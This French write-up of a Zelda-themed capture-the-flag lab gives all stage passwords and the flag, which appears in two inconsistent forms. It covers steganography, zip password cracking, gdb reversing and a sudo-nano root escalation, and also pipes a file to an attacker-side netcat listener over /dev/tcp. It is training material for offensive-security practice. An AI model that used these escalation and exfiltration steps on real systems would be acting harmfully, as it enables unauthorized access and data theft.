# Write up Wargame/Sauvez Zelda

## Consignes: 

```
Vous incarnez Link, le héros de la célèbre série de jeux « The legend of Zelda ».
Votre but sera de trouver où se trouve Ganondorf, votre ennemi juré, sur la carte d’Hyrule et de sauver la princesse du royaume. Celle-ci a été vue pour la dernière fois au château.
Pour cela, vous devrez trouver le chemin à parcourir. Vous débuterez l'aventure en case D3 en utilisant la commande « start ».
Au fur et à mesure de votre chemin, vous aurez différentes épreuves qui vous mèneront à l'épreuve finale. Celle-ci vous permettra de trouver le flag.
Bonne chance !
```

## Pièce jointe :

```
Image jpg représentant une carte
```

## Serveur :

```
Docker
```

## Points attribués :

```
30
```

## Hint : 

```

```

## Flag :

```
fl@g{F@rce_Sag3ss3_Cour4ge}
```

## Créateur :

```
ESD
```


## Description général du challenge :

```
Epreuves 
  de stégano,  
  de cassage de mot de passe archive zip
  de reversing 
  et d'élévation de privilège
```

L' image représente la carte sur laquelle il faut voyager. En effet, comme il est possible de le voir, celle-ci est découpée en différente cases qu’il
va falloir parcourir.

![](images/carte.jpg)



Connexion au challenge

```
ssh -p 32001 start@<ip_game1>
mdp :  start
```

Démarrage du challenge

Pour commencer l’aventure, il faut taper `start` en ligne de commande comme le montre la capture d’écran ci-dessous.

```
start@7f00ce80639a:~$ start
```

C’est après avoir tapé cette commande que l’épreuve commence.

```
Le jeu a commencé. Vous êtes désormais sur la case D3 de la carte. La princesse du royaume a été enlevée. Pour la retrouver vous devrez trouver les bonnes cases à parcourir. Commencez par vous rendre au dernier endroit où la princesse a été vue. Utilisez le script 'move' suivi du nom de la case souhaitée pour vous déplacer. Attention : vous ne pouvez essayer de vous déplacer que d'une case horizontalement ou verticalement.

start@7f00ce80639a:~$ 
```

Un texte indique que le jeu a commencé et nous nous retrouvons sur la case D3. Voici le chemin complet que l’utilisateur doit parcourir : D3 -> C3 ->
C2 -> C1 -> B1 -> A1 -> A2 -> A3.
Pour se déplacer, il faut utiliser le script `move`. Les déplacements sont guidés. En effet, l’utilisateur ne pourra accéder qu’aux cases appartenant au chemin à parcourir. Par exemple, en partant de la case D3, si l’utilisateur souhaite aller en case E3, une phrase lui expliquant que le chemin n’est pas le bon s’affichera (comme le montre la capture ci-dessous).

```
D3@7f00ce80639a:~$ move E3
Vous devez vous rendre au dernier endroit où a été vue la princesse. Pas dans cette direction.
```

Au contraire, si l’utilisateur donne la bonne case, le scénario continuera et il pourra avancer dans l’aventure.

Par exemple, si on se déplace sur la case C3 à partir de la case D3, l’aventure continue.

```
D3@7f00ce80639a:~$ move C3
```

```
Vous vous dirigez vers le château et vous retrouvez face à Impa, la nourrice de la princesse. Celle-ci à l'air très inquiète. 'Enfin te voilà !', dit-elle. 'Cela fait à peine quelques heures que Ganondorf est parti avec notre chère princesse. Je n'ai malheureusement aucune information à te donner. Dirige toi vers le village. Là-bas quelqu'un t'aidera forcément !'
C3@7f00ce80639a:~$ 
```

Déplacement

```
C3@7f00ce80639a:~$ move C2
```

```
Vous arrivez dans une forêt. Vous regardez aux alentours à la recherche d'éventuels ennemis mais ne trouvez rien. Vous continuez votre chemin.
```

Déplacement

```
C2@7f00ce80639a:~$ move C1
```

```
Vous arrivez enfin au village lorsqu'un vieux sage vous interpelle. 'Jeune héros', dit-il. 'Réussis mon épreuve et je t'aiderai dans ta quête. Voici une carte. Le nom de la princesse d'Hyrule t'aidera à révéler ses secrets. Reviens me voir lorsque tu auras trouvé.
```

En arrivant sur la case C1, nous arrivons sur la première case avec une petite épreuve. Ici c’est une épreuve de stéganographie.

Méthode 1: Récupérer le fichier avec l'outil SCP:

Il faut tout d'abord créer un répertoire dans /tmp et copier le fichier map.jpg dans celui-ci.
Bien penser àc hanger les droits en lecture, exécution à tous.

```bash
$ scp -P 32001 start@game1.marshack.fr:/tmp/azerty/map.jpg .
```

Méthode2 : 

Lancer un listener sur la machine attaquante

```bash
nc -lvnp 1337 > map.jpg
```

et lancer le transfert du fichier depuis la machine victime:

```bash
C1@13d99f8e56a6:~$ cat map.jpg > /dev/tcp/172.16.1.131/1337
```

L’utilisateur devra utiliser l’outil « steghide » afin de révéler ce que cache « map.jpg » comme ceci :

```bash
steghide extract -sf map.jpg
Enter passphrase:
wrote extracted data to "pwd.txt"
```

La « passphrase » à utiliser est, comme dit dans l’énoncé, le nom de la princesse d’Hyrule qu’il nous est possible de retrouver dans le titre du challenge ou sur internet. 
Son nom est « Zelda ».

Avec cette commande, nous débloquons le fichier « pwd.txt » dans lequel se trouve le mot de passe qui nous permettra de continuer l’aventure.
Le mot de passe est **dangerous_go_alone**.

```
cat pwd.txt
dangerous_go_alone
```

Afin de pouvoir continuer son chemin, l’utilisateur devra utiliser le script `vieux_sage` et il devra indiquer le mot de passe trouvé précédemment.

```
C1@7f00ce80639a:~$ vieux_sage
Vous retournez voir le vieux sage. 'As-tu trouvé ?', vous demande-t-il.
Password:     <== saisir : dangerous_go_alone
```

L’utilisateur est alors ensuite automatiquement emmené à la case suivante **B1** à partir de laquelle il pourra continuer son chemin.

```
'Très bien', dit le vieux sage. 'Dirige toi loin vers le nord. Dans la forêt quelqu'un saura où se cache ce que tu cherches.' Vous vous dirigez donc vers le nord.
B1@7f00ce80639a:~$ 
```

Déplacement 

```
B1@7f00ce80639a:~$ move A1
```

```
Vous arrivez au bout de la forêt et vous retrouvez face à une fée. Celle-ci vous regarde sans étonnement. 'Je vais te soumettre à une épreuve.' dit-elle.'Si tu réussis, je te dirais où se trouve ce que tu cherches. A toi de trouver le mot de passe qui te permettra d'ouvrir ce dossier. Reviens me voir lorsque tu auras trouvé'
A1@7f00ce80639a:~$ 

```

L’utilisateur devra ici ouvrir le dossier zippé **pwd.zip** à l’aide du mot de passe trouvable avec la commande suivante :

```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt pwd.zip

PASSWORD FOUND!!!!:pw == hyruletemple
```

L’utilisateur devra ici ouvrir le dossier zippé « pwd.zip » à l’aide du mot de passe trouvable avec la commande suivante :
Nous pouvons ensuite dézipper le dossier :

```
unzip pwd.zip
Archive: pwd.zip
[pwd.zip] pwd.txt password:
 extracting: pwd.txt
```

Nous obtenons donc le mot de passe **navi** qui nous permettra d’avancer en utilisant le script `fée` :

```
cat pwd.txt
navi
```

Déplacement 

```
A1@7f00ce80639a:~$ fée
As-tu trouvé ?
Password: 
```

```
'Bien joué !', dit la fée. 'A moi de te dire ce que je sais. Ganondorf s'est réfugié en case A3 avec la princesse. Va et sauve le royaume !' Vous avancez jusqu'en case A2 mais vous retrouvez bloqué par une grande porte vérouillée. Face à vous se trouve une pancarte.txt.
A2@7f00ce80639a:~$  
```

```
fée.txt         <== Consigne
pancarte.txt    <== Consigne
porte           <== Déplacement
serrure         <== Binaire à analyzer

```

```
cat pancarte.txt
"Jeune héros du temps, Ganondorf se trouve derrière cette porte. Avant de pouvoir l'affronter il te faut trouver la clé permettant de l'ouvrir. Pour cela, analyse l'exécutable 'serrure'. Lorsque tu auras trouvé tu pourras tenter d'ouvrir la porte." 

```

Nous devons donc analyser l’exécutable « serrure » à l’aide de l’outil `gdb`.


```
NU gdb (Debian 10.1-2) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from serrure...
(No debugging symbols found in serrure)
```

Désassemblage de la fonction **main**

```
disass main
Dump of assembler code for function main:
   0x00000000000011ed <+0>:	push   rbp
   0x00000000000011ee <+1>:	mov    rbp,rsp
   0x00000000000011f1 <+4>:	sub    rsp,0x20
   0x00000000000011f5 <+8>:	lea    rdi,[rip+0xe2a]        # 0x2026
   0x00000000000011fc <+15>:	mov    eax,0x0
   0x0000000000001201 <+20>:	call   0x1030 <printf@plt>
   0x0000000000001206 <+25>:	lea    rax,[rbp-0xd]
   0x000000000000120a <+29>:	mov    rsi,rax
   0x000000000000120d <+32>:	lea    rdi,[rip+0xe22]        # 0x2036
   0x0000000000001214 <+39>:	mov    eax,0x0
   0x0000000000001219 <+44>:	call   0x1050 <__isoc99_scanf@plt>
   0x000000000000121e <+49>:	mov    edi,0x5
   0x0000000000001223 <+54>:	call   0x1155 <pwd_processing>
   0x0000000000001228 <+59>:	lea    rax,[rbp-0xd]
   0x000000000000122c <+63>:	lea    rsi,[rip+0xe06]        # 0x2039
   0x0000000000001233 <+70>:	mov    rdi,rax
   0x0000000000001236 <+73>:	call   0x1040 <strcmp@plt>

```

Afin de trouver le mot de passe, l’utilisateur devra poser un *breakpoint* sur la ligne précédent le **strcmp** (offset +73)

```
break * main+73
Breakpoint 1 at 0x1236
```

Après avoir placé le breakpoint, on lance le programme avec la commande `run`.

```
run
Starting program: /opt/virtualenvs/ctfpy3/serrure 
Entrer le mdp :aaa

Breakpoint 1, 0x0000555555555236 in main ()

```

Le programme s'arrête sur le **breakpoint**. On regarde ce que contient **rsi** parce que le **strcmp** utilise les registres **rdi** et **rsi**. 
Respectivement, ceux-ci représentent le mot de passe entré lors du lancement et le mot de passe recherché.

```
x /s $rsi
0x555555556039:	"golden_ganon_key"
```

Le mot de passe à trouver est **golden_ganon_key**. L’utilisateur devra ensuite utiliser le script `porte` et entrer le mot de passe trouver pour accéder
à l’épreuve finale du challenge.

Déplacement

```
A2@7f00ce80639a:~$ porte
As-tu trouvé ?
Password:      <==  saisir golden_ganon_key 

```

```
Vous passez la porte et vous retrouvez face à Ganondorf, prêt à se battre. Pour le vaincre, vous devez devenir plus fort, acquérir des droits que vous n'avez pas.
A3@7f00ce80639a:~$ 
```

L’épreuve finale se trouve donc sur la case A3. Cette épreuve correspond à une élévation de privilèges.
Comme indiqué dans l’énoncé, il faut ici que l’utilisateur acquière des droits qu’il n’a pas. Il doit donc devenir root.
Pour cela, il doit donc tout d’abord connaître par quel moyen il peut devenir root. On utilise donc la commande suivante :

```
sudo -l
Matching Defaults entries for A3 on 7f00ce80639a:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User A3 may run the following commands on 7f00ce80639a:
    (superuser) NOPASSWD: /usr/bin/nano
```



Nous pouvons voir ici que n’importe qui peut utiliser **nano** en tant qu’administrateur.
Si nous essayons d’utiliser un autre outil en tant qu’administrateur, un mot de passe que nous ne connaissons pas nous est demandé.

```
sudo -u superuser vim
[sudo] password for A3:
```

Nous devons donc ici devenir root à partir de nano. Pour cela il est possible, si la faille n’est pas connue de l’utilisateur, de se rendre sur un site
comme **gtfobins.com** sur lequel il est expliqué comment devenir root à partir de **nano**.

Voici ce qu’il faut faire :

```
sudo -u superuser nano
^R^X             <==   Control R suivi de Control X
reset; sh 1>&0 2>&0
```

Affichage du contenu de **nano**

```
  GNU nano 4.8                                   New Buffer                                             


Command to execute: reset; sh 1>&0 2>&0                                                                 
^G Get Help                       M-F New Buffer                    ^X Read File
^C Cancel                         M-\ Pipe Text
```

Ensuite, l’utilisateur utilise la commande `clear` suivie de la commande `whoami` pour savoir qui il est.

```
$ whoami
superuser     <==  on se retrouve en tant que superuser
$ 
```

```
cat /home/superuser/flag.txt
Bravo ! Ganondorf est vaincu ! Hyrule et la princesse Zelda sont sauvés ! Voici le flag : fl@g{F0rce_Sag3ss3_Cour4ge}.

```

Le flag est : **fl@g{F0rce_Sag3ss3_Cour4ge}**

<!-- Ok F : 20220423 -->
